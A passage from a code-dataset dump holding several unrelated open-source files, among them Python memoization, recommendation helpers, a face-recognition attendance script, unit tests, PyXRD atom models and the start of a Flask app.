necesario volver a calcular los\n resultados, ya que se pueden recuperar de la caché.\n\n Attributes:\n func: La función que se memoiza.\n cache: El diccionario que se utiliza para almacenar los resultados en caché.\n\n Methods:\n __call__(self, *args): Verifica si el resultado de la función ya está en caché, si es así,\n devuelve el resultado almacenado en caché. De lo contrario, calcula el resultado y lo\n almacena en caché antes de devolverlo.\n\n __repr__(self): Devuelve la documentación de la función original.\n \"\"\"\n\n def __init__(self, func):\n self.func = func\n self.cache = {}\n\n def __call__(self, *args):\n try:\n print(self.cache)\n return self.cache[args]\n # se ejecuta cuando se intenta acceder a una clave que no existe en el\n # diccionario self.cache\n except KeyError:\n self.cache[args] = value = self.func(*args)\n print(self.cache)\n return value\n except TypeError:\n return self.func(*args)\n\n def __repr__(self):\n return self.func.__doc__\n\n\n# fibonacci = memoized(fibonaci)\n@memoized\ndef fibonacci(n): # llama al init de memoized\n \"\"\"\n Función recursiva que retorna la sucesión de fibonacci\n\n Atributes:\n n: numero entero al cual se le calculará la sucesión\n de Fibonacci\n\n \"\"\"\n if n in (0, 1):\n return n\n menos_uno = fibonacci(n - 1)\n menos_dos = fibonacci(n - 2)\n return menos_uno + menos_dos\n\n\nprint(fibonacci(1000)) # ejecuta el call de la clase y es una instancia de ella\n","repo_name":"arbarr20/python-notes","sub_path":"poo2/poo2-files/scripts_decoradores/memoized_decorator2.py","file_name":"memoized_decorator2.py","file_ext":"py","file_size_in_byte":2234,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"70850319914","text":"import numpy as np\nimport pandas as pd\n\ndef get_topk_index(matrix, topk=10):\n sorted_index = np.argsort(matrix)[:,::-1]\n return sorted_index[:, 1:topk+1]\n\ndef get_recommend_with_topk_user(purchase_matrix, topk_index, target_purchase_matrix=None):\n if target_purchase_matrix is None:\n target_purchase_matrix = purchase_matrix\n purchase_item_count = np.clip(purchase_matrix[topk_index] - target_purchase_matrix[:, np.newaxis, :], 0, 1)\n purchase_item_count = np.sum(purchase_item_count, axis=1)\n sorted_item_index = np.argsort(purchase_item_count)[:,::-1]\n sorted_item_count = np.take_along_axis(purchase_item_count, sorted_item_index, axis=1)\n return sorted_item_index, sorted_item_count\n\ndef get_recommend_with_topk_user_score(purchase_matrix, topk_index, similarity_score):\n topk_score = np.take_along_axis(similarity_score, topk_index, axis=1)\n topk_score = np.expand_dims(topk_score, axis=-1)\n purchase_item_matrix = purchase_matrix[topk_index]\n recormmend_item_socre = np.sum(purchase_item_matrix * topk_score, axis=1)\n sorted_item_index = np.argsort(recormmend_item_socre)[:,::-1]\n sorted_item_score = np.take_along_axis(recormmend_item_socre, sorted_item_index, axis=1)\n return sorted_item_index, sorted_item_score\n\ndef get_recommend_matrix(purchase_matrix, recommend_item_index, recommend_flag=2):\n for c_idx, col in enumerate(recommend_item_index):\n for row in col:\n purchase_matrix[c_idx][row] = recommend_flag\n return purchase_matrix\n","repo_name":"cjwang0318/Recommendation","sub_path":"src/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":1520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1278749807","text":"from model import create_model\nimport numpy as np\nimport os.path\nimport cv2\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\nfrom align import AlignDlib\nfrom sklearn.metrics import f1_score, accuracy_score\nfrom get_profile import getprofile\n\nfrom sklearn.preprocessing import LabelEncoder\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.svm import LinearSVC\n\n\nnn4_small2_pretrained = create_model()\nnn4_small2_pretrained.load_weights('weights/nn4.small2.v1.h5')\n\n\n\nclass IdentityMetadata():\n def __init__(self, base, name, file):\n # dataset base directory\n self.base = base\n # identity name\n self.name = name\n # image file name\n self.file = file\n\n def __repr__(self):\n return self.image_path()\n\n def image_path(self):\n return os.path.join(self.base, self.name, self.file)\n\ndef load_metadata(path):\n metadata = []\n for i in sorted(os.listdir(path)):\n for f in sorted(os.listdir(os.path.join(path, i))):\n # Check file extension. Allow only jpg/jpeg' files.\n ext = os.path.splitext(f)[1]\n if ext == '.jpg' or ext == '.jpeg':\n metadata.append(IdentityMetadata(path, i, f))\n return np.array(metadata)\n\nmetadata = load_metadata('clusters')\nprint (metadata)\n\n\n\n#matplotlib inline\n\ndef load_image(path):\n img = cv2.imread(path, 1)\n # OpenCV loads images with color channels\n # in BGR order. So we need to reverse them\n return img[...,::-1]\n\ndef load_image1(img):\n # OpenCV loads images with color channels\n # in BGR order. So we need to reverse them\n return img[...,::-1]\n\n# Initialize the OpenFace face alignment utility\nalignment = AlignDlib('models/landmarks.dat')\n\n# Load an image\n#jc_orig = load_image(metadata[77].image_path())\n#print(jc_orig)\n\n# Detect face and return bounding box\n#bb = alignment.getLargestFaceBoundingBox(jc_orig)\n\n# Transform image using specified face landmark indices and crop image to 96x96\n#jc_aligned = alignment.align(96, jc_orig, bb, landmarkIndices=AlignDlib.OUTER_EYES_AND_NOSE)\n\n# Show original image\n#plt.subplot(131)\n#plt.imshow(jc_orig)\n#cv2.imshow('org img',jc_orig)\n#cv2.waitKey(0)\n\n# Show original image with bounding box\n#plt.subplot(132)\n#plt.imshow(jc_orig)\n#plt.gca().add_patch(patches.Rectangle((bb.left(), bb.top()), bb.width(), bb.height(), fill=False, color='red'))\n\n# Show aligned image\n#plt.subplot(133)\n#plt.imshow(jc_aligned)\n#cv2.imshow('aligned',jc_aligned)\n#cv2.waitKey(0)\n\ndef align_image(img):\n return alignment.align(96, img, alignment.getLargestFaceBoundingBox(img),\n landmarkIndices=AlignDlib.OUTER_EYES_AND_NOSE)\n\n\nembedded = np.zeros((metadata.shape[0], 128))\n\nfor i, m in enumerate(metadata):\n #print (m.image_path())\n #img = load_image(m)\n try:\n img=cv2.imread(m.image_path())\n img = align_image(img)\n #print ('img',img)\n # scale RGB values to interval [0,1]\n img = (img / 255.).astype(np.float32)\n # obtain embedding vector for image\n embedded[i] = nn4_small2_pretrained.predict(np.expand_dims(img, axis=0))[0]\n except:\n continue\n\n#print ('embedded',embedded)\n\ndef distance(emb1, emb2):\n return np.sum(np.square(emb1 - emb2))\n\ndef show_pair(idx1, idx2):\n plt.figure(figsize=(8,3))\n a=distance(embedded[idx1],embedded[idx2])\n # plt.suptitle(f'Distance = {distance(embedded[idx1], embedded[idx2]):.2f}')\n #plt.subplot(121)\n plt.imshow(load_image(metadata[idx1].image_path()))\n cv2.imshow('img1',load_image(metadata[idx1].image_path()))\n cv2.imshow('img2',load_image(metadata[idx2].image_path()))\n cv2.waitKey(0)\n #plt.subplot(122)\n #plt.imshow(load_image(metadata[idx2].image_path()))\n print (a)\n\n\n\ntargets = np.array([m.name for m in metadata])\n\nencoder = LabelEncoder()\nencoder.fit(targets)\n\n# Numerical encoding of identities\ny = encoder.transform(targets)\n\ntrain_idx = np.arange(metadata.shape[0]) % 2 != 0\ntest_idx = np.arange(metadata.shape[0]) % 2 == 0\n\n\n\n# 50 train examples of 10 identities (5 examples each)\nX_train = embedded[train_idx]\n# 50 test examples of 10 identities (5 examples each)\nX_test = embedded[test_idx]\n\ny_train = y[train_idx]\ny_test = y[test_idx]\n\nknn = KNeighborsClassifier(n_neighbors=1, metric='euclidean')\nsvc = LinearSVC()\n\nknn.fit(X_train, y_train)\nsvc.fit(X_train, y_train)\n\nacc_knn = accuracy_score(y_test, knn.predict(X_test))\nacc_svc = accuracy_score(y_test, svc.predict(X_test))\n\nprint('KNN accuracy', acc_knn, 'SVM accuracy', acc_svc)\n\n\n\nexample_idx = 12\n\nexample_image = load_image(metadata[test_idx][example_idx].image_path())\nexample_prediction = svc.predict([embedded[test_idx][example_idx]])\nexample_identity = encoder.inverse_transform(example_prediction)[0]\nprint(example_identity)\n\n\n\nprofile=getprofile(int(example_identity))\ncv2.imshow('test',example_image)\ncv2.waitKey(0)\n#plt.title(f'Recognized as {example_identity}')\n\nprint('recog as:',profile)\n","repo_name":"aqsa1996/MyProjects","sub_path":"Videobasedattendance/face_recog.py","file_name":"face_recog.py","file_ext":"py","file_size_in_byte":4973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6912836537","text":"#학생 분류하기\ndef student():\n a,b=map(int,input().split())\n if a==1:\n 남학생(b)\n elif a==2:\n 여학생(b)\n\n#남학생 함수\ndef 남학생(n):\n global length\n for i in range(n-1,length,n):\n condition[i]=not condition[i]\n\n#여학생 함수\ndef 여학생(n):\n n=n-1\n global length\n condition[n]=not condition[n]\n i=1\n while n+i=0:\n if condition[n+i]==condition[n-i]:\n condition[n+i]=not condition[n+i]\n condition[n-i]=not condition[n-i]\n i+=1\n\n#출력하기\ndef result(aa):\n for i in range(1,len(aa)+1):\n print(aa[i-1], end=' ')\n if i%20==0:\n print()\n\n\n## 메인 함수 ##\n'''\n#입력 받기\nglobal length\nlength=int(input(\"스위치 수:\"))\n\nglobal condition\ncondition=list(map(bool, map(int,input(\"스위치 상태:\").split())))\n\nN=int(input(\"학생 수:\"))\nfor i in range(N):\n student()\n\ncondition=list(map(int,condition))\nresult(condition)\n'''\n\n\n#result([1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5])\n\n\nglobal length\nlength=8\nglobal condition\ncondition=list(map(bool, map(int,[0,1,0,1,0,0,0,1])))\n\n남학생(3)\n여학생(3)\ncondition=list(map(int,condition))\nresult(condition)\n\n","repo_name":"yellow-jam/BOJ","sub_path":"python/1244_스위치 켜고 끄기.py","file_name":"1244_스위치 켜고 끄기.py","file_ext":"py","file_size_in_byte":1230,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27734969746","text":"import unittest\nimport PIL.Image\nimport recognition.util.image\nimport recognition.util.path as path\n\nfrom recognition.model.darknet.yolov3 import YoloV3\nfrom recognition.parse.process import Process\n\n\nclass ProcessTestCase(unittest.TestCase):\n\n def setUp(self):\n self._transform = Process(anchors=path.get_anchors(), channel=3)\n\n def test_serialize_and_deserialize(self):\n image = PIL.Image.new('RGB', size=(576, 768), color=(255, 255, 255))\n\n content = recognition.util.image.to_bytes(image)\n serialize = self._transform.serialize(\n content, b'label', size=(image.height, image.width),\n bbox=[[105.5, 46.5, 470.5, 121.5, 0], [117.5, 136.5, 454.5, 151.5, 0]], bbox_max_length=2)\n\n image, bbox = self._transform.deserialize(serialize)\n self.assertEqual((416, 416, 3), image.shape)\n self.assertEqual((1, 13, 13, 3, 6), bbox[0].shape)\n self.assertEqual((1, 26, 26, 3, 6), bbox[1].shape)\n self.assertEqual((1, 52, 52, 3, 6), bbox[2].shape)\n\n def test_padded_shapes(self):\n self.assertIsNone(self._transform.padded_shapes())\n\n def test_convert(self):\n result = Process.convert([[[10, 10, 40, 40, 1, 1]]], 13, YoloV3.ANCHOR_MASKS[0])\n self.assertEqual([1, 13, 13, 3, 6], result.shape)\n\n result = Process.convert([[[10, 10, 40, 40, 1, 1]]], 26, YoloV3.ANCHOR_MASKS[1])\n self.assertEqual([1, 26, 26, 3, 6], result.shape)\n\n result = Process.convert([[[10, 10, 40, 40, 1, 1]]], 52, YoloV3.ANCHOR_MASKS[1])\n self.assertEqual([1, 52, 52, 3, 6], result.shape)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"jonattanva/text-recognition","sub_path":"tests/parse/process_test.py","file_name":"process_test.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"45296309255","text":"\"\"\"Automated tests for the Matchmaker class.\"\"\"\n\nimport unittest\nfrom unittest.mock import Mock\n\nfrom santa.matchmaker import Matchmaker\n\n\nclass TestMatchmaker(unittest.TestCase):\n \"\"\"Tests the Matchmaker class.\"\"\"\n\n def test_match_zero_person(self):\n \"\"\"Test the match() method with a list of zero Person objects.\"\"\"\n matchmaker = Matchmaker()\n\n with self.assertRaises(ValueError):\n matchmaker.match([])\n\n def test_match_one_person(self):\n \"\"\"Test the match() method with a list of one Person object.\"\"\"\n matchmaker = Matchmaker()\n\n with self.assertRaises(ValueError):\n matchmaker.match([Mock('Lonely', 'forever@alone.com')])\n\n def test_match_two_person(self):\n \"\"\"Test the match() method with a list of two Person objects.\"\"\"\n red = Mock()\n red.name = 'Red'\n red.email = 'red@red.com'\n\n blue = Mock()\n blue.name = 'Blue'\n blue.email = 'blue@blue.com'\n\n matchmaker = Matchmaker()\n matchmaker.match([red, blue])\n assert red.santa is blue\n assert blue.santa is red\n\n def test_match_typical(self):\n \"\"\"Test the match() method in a typical condition.\"\"\"\n matchmaker = Matchmaker()\n\n # Test many times, checking if each case produced a derangement\n for i in range(200):\n people = []\n for c in ['a', 'b', 'c', 'd', 'e', 'f', 'g']:\n person = Mock()\n person.name = c\n person.email = c + '@com.com'\n people.append(person)\n\n matchmaker.match(people)\n for person in people:\n assert person.santa is not person\n","repo_name":"SamuraiSigma/secret-santa","sub_path":"secret_santa/test/santa/test_matchmaker.py","file_name":"test_matchmaker.py","file_ext":"py","file_size_in_byte":1702,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5219476063","text":"from functools import partial\nfrom warnings import warn\n\nimport numpy as np\n\nfrom pyxrd.generic.io import storables, Storable, get_case_insensitive_glob\nfrom pyxrd.generic.models import DataModel\nfrom pyxrd.generic.models.mixins import CSVMixin\nfrom pyxrd.calculations.data_objects import AtomTypeData, AtomData\nfrom pyxrd.calculations.atoms import get_atomic_scattering_factor, get_structure_factor\n\nfrom mvc import Observer\nfrom mvc.models.properties.string_properties import StringProperty\nfrom mvc.models.properties.signal_mixin import SignalMixin\nfrom mvc.models.properties.float_properties import FloatProperty\nfrom mvc.models.properties.bool_property import BoolProperty\nfrom mvc.models.properties.read_only_mixin import ReadOnlyMixin\nfrom mvc.models.properties.labeled_property import LabeledProperty\nfrom mvc.models.properties.integer_properties import IntegerProperty\n\n@storables.register()\nclass AtomType(CSVMixin, DataModel, Storable):\n \"\"\"\n An AtomType model contains all the physical & chemical information for \n one ion, e.g. Fe3+ & Fe2+ are two different AtomTypes.\n \"\"\"\n\n # MODEL METADATA:\n class Meta(DataModel.Meta):\n store_id = \"AtomType\"\n\n #: The project this AtomType belongs to or None. Effectively an alias for `parent`.\n project = property(DataModel.parent.fget, DataModel.parent.fset)\n\n _data_object = None\n @property\n def data_object(self):\n \"\"\"\n The data object that is used in the calculations framework \n (see :mod:`pyxrd.generic.calculations.atoms`).\n Is an instance of :class:`~pyxrd.generic.calculations.data_objects.AtomTypeData`\n \"\"\"\n\n self._data_object.par_c = self.par_c\n self._data_object.debye = self.debye\n self._data_object.charge = self.charge\n self._data_object.weight = self.weight\n\n return self._data_object\n\n #: Name of the AtomType (e.g. :math:`Fe^{2+}`)\n name = StringProperty(\n default=\"\", text=\"Name\",\n visible=True, persistent=True, tabular=True,\n signal_name=\"visuals_changed\",\n mix_with=(SignalMixin,)\n )\n\n #: The atomic number, or an arbitrarily high number (+300) for compounds\n atom_nr = IntegerProperty(\n default=0, text=\"Atom Nr\",\n visible=True, persistent=True,\n widget_type=\"entry\"\n )\n\n def __get_par_a(self, index=0):\n return self._data_object.par_a[index]\n\n def __set_par_a(self, value, index=0):\n assert (index >= 0 and index < 5)\n self._data_object.par_a[index] = value\n\n def __get_par_b(self, index=0):\n return self._data_object.par_b[index]\n\n def __set_par_b(self, value, index=0):\n assert (index >= 0 and index < 5)\n self._data_object.par_b[index] = value\n\n #: Atomic scattering factor :math:`a_1`\n par_a1 = FloatProperty(\n default=0.0, text=\"a1\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_a, index=0), fset=partial(__set_par_a, index=0)\n )\n #: Atomic scattering factor :math:`a_2`\n par_a2 = FloatProperty(\n default=0.0, text=\"a2\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_a, index=1), fset=partial(__set_par_a, index=1)\n )\n #: Atomic scattering factor :math:`a_3`\n par_a3 = FloatProperty(\n default=0.0, text=\"a3\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_a, index=2), fset=partial(__set_par_a, index=2)\n )\n #: Atomic scattering factor :math:`a_4`\n par_a4 = FloatProperty(\n default=0.0, text=\"a4\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_a, index=3), fset=partial(__set_par_a, index=3)\n )\n #: Atomic scattering factor :math:`a_5`\n par_a5 = FloatProperty(\n default=0.0, text=\"a5\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_a, index=4), fset=partial(__set_par_a, index=4)\n )\n\n #: Atomic scattering factor :math:`b_1`\n par_b1 = FloatProperty(\n default=0.0, text=\"b1\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_b, index=0), fset=partial(__set_par_b, index=0)\n )\n #: Atomic scattering factor :math:`b_2`\n par_b2 = FloatProperty(\n default=0.0, text=\"b2\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_b, index=1), fset=partial(__set_par_b, index=1)\n )\n #: Atomic scattering factor :math:`b_3`\n par_b3 = FloatProperty(\n default=0.0, text=\"b3\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_b, index=2), fset=partial(__set_par_b, index=2)\n )\n #: Atomic scattering factor :math:`b_4`\n par_b4 = FloatProperty(\n default=0.0, text=\"b4\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_b, index=3), fset=partial(__set_par_b, index=3)\n )\n #: Atomic scattering factor :math:`b_5`\n par_b5 = FloatProperty(\n default=0.0, text=\"b5\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,),\n fget=partial(__get_par_b, index=4), fset=partial(__set_par_b, index=4)\n )\n\n #: Atomic scattering factor c\n par_c = FloatProperty(\n default=0.0, text=\"c\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,)\n )\n\n #: Debye-Waller scattering factor\n debye = FloatProperty(\n default=0.0, text=\"c\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,)\n )\n\n #: The charge of the ion (eg. 3.0 for :math:`Al^{3+}`)\n charge = FloatProperty(\n default=0.0, text=\"Charge\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,)\n )\n\n #: The atomic weight for this ion\n weight = FloatProperty(\n default=0.0, text=\"Weight\",\n visible=True, persistent=True,\n signal_name=\"data_changed\", widget_type=\"entry\",\n mix_with=(SignalMixin,)\n )\n\n # ------------------------------------------------------------\n # Initialization and other internals\n # ------------------------------------------------------------\n def __init__(self, *args, **kwargs):\n \"\"\"\n Constructor takes any of its properties as a keyword argument.\n Any other arguments or keywords are passed to the base class.\n \"\"\"\n keys = [ \"data_%s\" % prop.label for prop in type(self).Meta.get_local_persistent_properties()]\n keys.extend([ prop.label for prop in type(self).Meta.get_local_persistent_properties()])\n my_kwargs = self.pop_kwargs(kwargs, *keys)\n super(AtomType, self).__init__(*args, **kwargs)\n kwargs = my_kwargs\n\n # Set up data object\n self._data_object = AtomTypeData(\n par_a=np.zeros(shape=(5,), dtype=float),\n par_b=np.zeros(shape=(5,), dtype=float),\n par_c=0.0,\n debye=0.0,\n charge=0.0,\n weight=0.0\n )\n\n # Set attributes:\n self.name = str(self.get_kwarg(kwargs, \"\", \"name\", \"data_name\"))\n self.atom_nr = int(self.get_kwarg(kwargs, 0, \"atom_nr\", \"data_atom_nr\"))\n self.weight = float(self.get_kwarg(kwargs, 0, \"weight\", \"data_weight\"))\n self.charge = float(self.get_kwarg(kwargs, 0, \"charge\", \"data_charge\"))\n self.debye = float(self.get_kwarg(kwargs, 0, \"debye\", \"data_debye\"))\n\n for kw in [\"par_a%d\" % i for i in range(1, 6)] + [\"par_b%d\" % i for i in range(1, 6)] + [\"par_c\"]:\n setattr(\n self, kw, self.get_kwarg(kwargs, 0.0, kw, \"data_%s\" % kw)\n )\n\n def __str__(self):\n return \"\" % (self.name, id(self))\n\n def get_atomic_scattering_factors(self, stl_range):\n \"\"\"\n Returns the atomic scattering factor for this `AtomType` for the given range\n of sin(theta)/lambda (`stl_range`) values. \n \"\"\"\n angstrom_range = ((stl_range * 0.05) ** 2)\n return get_atomic_scattering_factor(angstrom_range, self.data_object)\n\n pass # end of class\n\n@storables.register()\nclass Atom(DataModel, Storable):\n \"\"\"\n Atom objects combine structural information (z coordinate and proportion)\n and an AtomType. \n \"\"\"\n\n # MODEL METADATA:\n class Meta(DataModel.Meta):\n store_id = \"Atom\"\n layer_filters = [\n (\"Layer file\", get_case_insensitive_glob(\"*.lyr\")),\n ]\n\n _data_object = None\n @property\n def data_object(self):\n \"\"\"\n The data object that is used in the calculations framework \n (see :mod:`pyxrd.generic.calculations.atoms`).\n Is an instance of :class:`~pyxrd.generic.calculations.data_objects.AtomData` \n \"\"\"\n self._data_object.default_z = self.default_z\n self._data_object.stretch_z = self.stretch_z\n self._data_object.pn = self.pn\n self._data_object.atom_type = getattr(self.atom_type, \"data_object\", None)\n return self._data_object\n\n component = property(DataModel.parent.fget, DataModel.parent.fset)\n\n # PROPERTIES:\n\n #: The name of the Atom\n name = StringProperty(\n default=\"\", text=\"Name\",\n visible=True, persistent=True, tabular=True,\n signal_name=\"visuals_changed\",\n mix_with=(SignalMixin,)\n )\n\n #: Default z coordinate for this Atom. Also see :attr:`~z`\n default_z = FloatProperty(\n default=0.0, text=\"Default z\",\n visible=True, persistent=True, tabular=True,\n signal_name=\"data_changed\",\n mix_with=(SignalMixin,)\n )\n\n #: Flag indicating whether or not z coordinates should be stretched\n #: using the silicate lattice and unit cell dimensions from the Component.\n #: Should be set for interlayer atoms, so their z coordinates are adjusted\n #: when the component basal spacing is changed. Also see `z`.\n stretch_z = BoolProperty(\n default=False, text=\"Stretch z values\",\n visible=False, persistent=True,\n signal_name=\"data_changed\",\n mix_with=(SignalMixin,)\n )\n\n #: The z coordinate for this atom. If `stretch_values` is False or if\n #: this Atom's component is None, then this will return the `default_z`\n #: value. If `stretch_values` is True and a component is set on this Atom,\n #: it is calculated as::\n #:\n #: `lattice_d + (default_z - lattice_d) * factor`\n #:\n #: where `lattice_d` and `factor` are given by calling\n #:`get_interlayer_stretch_factors` on the :class:`~pyxrd.phases.models.Component`.\n @FloatProperty(\n default=None, text=\"Z\",\n visible=True, tabular=True,\n mix_with=(ReadOnlyMixin,)\n )\n def z(self):\n if self.stretch_values and self.component is not None:\n lattice_d, factor = self.component.get_interlayer_stretch_factors()\n return float(lattice_d + (self.default_z - lattice_d) * factor)\n return self.default_z\n\n #: The # of atoms (projected onto the c-axis for the considered unit cell)\n pn = FloatProperty(\n default=None, text=\"Multiplicity\",\n visible=True, persistent=True, tabular=True,\n signal_name=\"data_changed\",\n mix_with=(SignalMixin,)\n )\n\n def _get_weight(self):\n if self.atom_type is not None:\n return self.pn * self.atom_type.weight\n else:\n return 0.0\n\n #: The total weight for this Atom, taking `pn` into consideration.\n weight = FloatProperty(\n default=None, text=\"Weight\", fget=_get_weight,\n visible=False, persistent=False,\n mix_with=(ReadOnlyMixin,)\n )\n\n _atom_type_uuid = None\n _atom_type_name = None\n def _set_atom_type(self, value):\n old = type(self).atom_type._get(self)\n if old is not None:\n self.relieve_model(old)\n type(self).atom_type._set(self, value)\n if value is not None:\n self.observe_model(value)\n\n #: The AtomType to be used for this Atom.\n atom_type = LabeledProperty(\n default=None, text=\"Atom Type\",\n visible=True, persistent=False, tabular=True, data_type=AtomType,\n signal_name=\"data_changed\",\n fset=_set_atom_type,\n mix_with=(SignalMixin,)\n )\n\n # ------------------------------------------------------------\n # Initialization and other internals\n # ------------------------------------------------------------\n def __init__(self, *args, **kwargs):\n \"\"\"\n Constructor takes any of its properties as a keyword argument.\n \n In addition to the above, the constructor still supports the \n following deprecated keywords, maping to a current keyword:\n - z: maps to the 'default_z' keyword.\n \n Any other arguments or keywords are passed to the base class.\n \"\"\"\n\n my_kwargs = self.pop_kwargs(kwargs,\n \"data_name\", \"data_z\", \"z\", \"data_pn\", \"data_atom_type\", \"stretch_z\",\n \"atom_type_uuid\", \"atom_type_name\", \"atom_type_index\", \"atom_type\",\n *[prop.label for prop in type(self).Meta.get_local_persistent_properties()]\n )\n super(Atom, self).__init__(*args, **kwargs)\n kwargs = my_kwargs\n\n # Set up data object\n self._data_object = AtomData(\n default_z=0.0,\n pn=0.0\n )\n\n # Set attributes\n self.name = str(self.get_kwarg(kwargs, \"\", \"name\", \"data_name\"))\n\n self.stretch_values = bool(self.get_kwarg(kwargs, False, \"stretch_values\"))\n self.default_z = float(self.get_kwarg(kwargs, 0.0, \"default_z\", \"data_z\", \"z\"))\n self.pn = float(self.get_kwarg(kwargs, 0.0, \"pn\", \"data_pn\"))\n\n self.atom_type = self.get_kwarg(kwargs, None, \"atom_type\")\n self._atom_type_uuid = self.get_kwarg(kwargs, None, \"atom_type_uuid\")\n self._atom_type_name = self.get_kwarg(kwargs, None, \"atom_type_name\")\n\n def __str__(self):\n return \"\" % (self.name, repr(self))\n\n def _unattach_parent(self):\n self.atom_type = None\n super(Atom, self)._unattach_parent()\n\n # ------------------------------------------------------------\n # Notifications of observable properties\n # ------------------------------------------------------------\n @Observer.observe(\"removed\", signal=True)\n def on_removed(self, model, prop_name, info):\n \"\"\"\n This method observes the Atom types 'removed' signal,\n as such, if the AtomType gets removed from the parent project,\n it is also cleared from this Atom\n \"\"\"\n if model == self.atom_type:\n self.atom_type = None\n\n # ------------------------------------------------------------\n # Methods & Functions\n # ------------------------------------------------------------\n def get_structure_factors(self, stl_range):\n \"\"\"\n Get the atom's structure factor for a given range of 2*sin(θ) / λ values.\n Expects λ to be in nanometers!\n \"\"\"\n if self.atom_type is not None:\n return float(get_structure_factor(stl_range, self.data_object))\n else:\n return 0.0\n\n # ------------------------------------------------------------\n # Input/Output stuff\n # ------------------------------------------------------------\n def resolve_json_references(self):\n if getattr(self, \"_atom_type_uuid\", None) is not None:\n self.atom_type = type(type(self)).object_pool.get_object(self._atom_type_uuid)\n if getattr(self, \"_atom_type_name\", None) is not None:\n assert(self.component is not None)\n assert(self.component.phase is not None)\n assert(self.component.phase.project is not None)\n for atom_type in self.component.phase.project.atom_types:\n if atom_type.name == self._atom_type_name:\n self.atom_type = atom_type\n break\n self._atom_type_uuid = None\n self._atom_type_name = None\n\n def json_properties(self):\n retval = super(Atom, self).json_properties()\n if self.component is None or self.component.export_atom_types:\n retval[\"atom_type_name\"] = self.atom_type.name if self.atom_type is not None else \"\"\n else:\n retval[\"atom_type_uuid\"] = self.atom_type.uuid if self.atom_type is not None else \"\"\n return retval\n\n @staticmethod\n def get_from_csv(filename, callback=None, parent=None):\n \"\"\"\n Returns a list of atoms fetched from the .CSV file `filename`.\n If parent is passed, this will be used to resolve AtomType references,\n and will be passed to the constructor of the Atom as a keyword.\n If callback is passes it will be called with the loaded atom as the\n first and only argument.\n \"\"\"\n import csv\n atl_reader = csv.reader(open(filename, 'rb'), delimiter=',', quotechar='\"') # TODO create csv dialect!\n header = True\n atoms = []\n\n types = dict()\n if parent is not None:\n for atom_type in parent.phase.project.atom_types:\n if not atom_type.name in types:\n types[atom_type.name] = atom_type\n\n for row in atl_reader:\n if not header and len(row) >= 4:\n if len(row) == 5:\n name, z, def_z, pn, atom_type = row[0], float(row[1]), float(row[2]), float(row[3]), types[row[4]] if parent is not None else None\n else:\n name, z, pn, atom_type = row[0], float(row[1]), float(row[2]), types[row[3]] if parent is not None else None\n def_z = z\n\n if atom_type in types:\n atom_type = types[atom_type]\n\n new_atom = Atom(name=name, z=z, default_z=def_z, pn=pn, atom_type=atom_type, parent=parent)\n atoms.append(new_atom)\n if callback is not None and callable(callback):\n callback(new_atom)\n del new_atom\n\n header = False\n return atoms\n\n @staticmethod\n def save_as_csv(filename, atoms):\n \"\"\"\n Saves a list of atoms to the passed filename.\n \"\"\"\n import csv\n atl_writer = csv.writer(open(filename, 'wb'), delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n atl_writer.writerow([\"Atom\", \"z\", \"def_z\", \"pn\", \"Element\"])\n for item in atoms:\n if item is not None and item.atom_type is not None:\n atl_writer.writerow([item.name, item.z, item.default_z, item.pn, item.atom_type.name])\n\n pass # end of class\n\n","repo_name":"PyXRD/PyXRD","sub_path":"pyxrd/atoms/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":19559,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"72"} +{"seq_id":"74051437032","text":"from flask import Flask, render_template, request, jsonify\nfrom funcion_vocales import vocales\n\n# Crear la app\napp = Flask(__name__)\n\n# Endpoints (rutas de acceso a la app)\n# Visualizar la ruta de inicio \"/\"\n@app.route(\"/\")\n# Asociar la función correspondiente\ndef index(): \n # render_template, permite mostrar archivos html\n return render_template(\"index.html\")\n\n\n# Nueva ruta\n# Endpoints\n@app.route(\"/recibir\", 